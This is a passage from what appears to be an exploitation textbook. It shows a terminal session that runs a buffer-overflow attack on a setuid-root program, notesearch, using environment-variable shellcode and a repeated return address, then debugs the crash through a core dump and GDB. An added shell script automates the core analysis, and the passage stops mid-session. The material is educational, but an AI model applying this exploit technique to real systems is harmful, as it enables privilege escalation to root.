reader@hacking:~/booksrc $ export SHELLCODE=$(cat helloworld1)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9c6
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xc6\xf9\xff\xbf"x40')
-------[ end of note data ]-------
Segmentation fault
reader@hacking:~/booksrc $
Failure. Why do you think it crashed? In situations like this, GDB is your
best friend. Even if you already know the reason behind this specific crash,
learning how to effectively use a debugger will help you solve many other
problems in the future.
0x522 Investigating with GDB
Since the notesearch program runs as root, we can't debug it as a normal
user. We also can't just attach to a running copy of it, because it exits
too quickly. Another way to debug programs is with core dumps. From a root
prompt, the OS can be told to dump memory when the program crashes by using
the command ulimit -c unlimited. This raises the limit on core file size, so
dumped core files are allowed to get as big as needed. Now, when the program
crashes, its memory will be dumped to disk as a core file, which can be
examined using GDB.
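The core-dump workflow just described, wrapped into a script as an added example (this is not code from the book): it raises the core limit, reproduces the crash, decodes the exit status, and replays the GDB inspection in batch mode. It assumes gdb is installed, that the kernel's core_pattern writes ./core into the working directory, and that, as in the session below, it is run from a root shell when the target is setuid.

```shell
#!/bin/sh
# Added example, not code from the book: automates the core-dump workflow of
# 0x522 (raise the core limit, reproduce the crash, inspect the core in GDB).
# Assumptions: gdb is installed, the kernel's core_pattern writes "./core" into
# the working directory, and, as in the book, the script is run from a root
# shell when the target is setuid, since that is how the core above was made.

# Lift the per-process core-size limit so the kernel writes the whole image.
enable_core_dumps() {
    ulimit -c unlimited
    [ "$(ulimit -c)" = "unlimited" ]
}

# Map a shell exit status to the signal that killed the child. Shells report
# 128 + signal number, so the "Segmentation fault" (signal 11) above is 139.
exit_status_signal() {
    status="$1"
    if [ "$status" -le 128 ]; then
        echo "none"
        return 1
    fi
    case $((status - 128)) in
        11) echo "SIGSEGV" ;;
        6)  echo "SIGABRT" ;;
        4)  echo "SIGILL" ;;
        *)  echo "SIG$((status - 128))" ;;
    esac
}

# Run the target with its arguments; succeed only if a core file was written.
reproduce_crash() {
    rm -f ./core
    "$@"
    status=$?
    echo "target exited with status $status ($(exit_status_signal "$status"))"
    [ -f ./core ]
}

# Load the core on its own, print the instruction pointer at the time of the
# crash, and disassemble at the address execution was expected to reach, the
# same checks the interactive GDB session makes with "i r eip" and "x/5i".
analyze_core() {
    core="$1"
    expected="$2"
    gdb -q -batch -c "$core" \
        -ex 'set disassembly-flavor intel' \
        -ex 'info registers pc' \
        -ex "x/5i $expected"
}

# Usage: enable_core_dumps && reproduce_crash ./target arg && analyze_core ./core 0xbffff9a3
```

Because the core is loaded without the executable, GDB will report no debugging symbols, exactly as in the session below; the register and memory contents are still available.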
reader@hacking:~/booksrc $ sudo su
root@hacking:/home/reader/booksrc # ulimit -c unlimited
root@hacking:/home/reader/booksrc # export SHELLCODE=$(cat helloworld1)
root@hacking:/home/reader/booksrc # ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9a3
root@hacking:/home/reader/booksrc # ./notesearch $(perl -e 'print "\xa3\xf9\xff\xbf"x40')
-------[ end of note data ]-------
Segmentation fault (core dumped)
root@hacking:/home/reader/booksrc # ls -l ./core
-rw------- 1 root root 147456 2007-10-26 08:36 ./core
root@hacking:/home/reader/booksrc # gdb -q -c ./core
(no debugging symbols found)
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
Core was generated by `./notesearch
£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E.
Program terminated with signal 11, Segmentation fault.
#0 0x2c6541b7 in ?? ()
(gdb) set dis intel
(gdb) x/5i 0xbffff9a3
0xbffff9a3: call 0x2c6541b7
0xbffff9a8: ins BYTE PTR es:[edi],[dx]
0xbffff9a9: outs [dx],DWORD PTR ds:[esi]
0xbffff9aa: sub al,0x20
0xbffff9ac: ja 0xbffffa1d
(gdb) i r eip
eip 0x2c6541b7 0x2c6541b7
(gdb) x/32xb 0xbffff9a3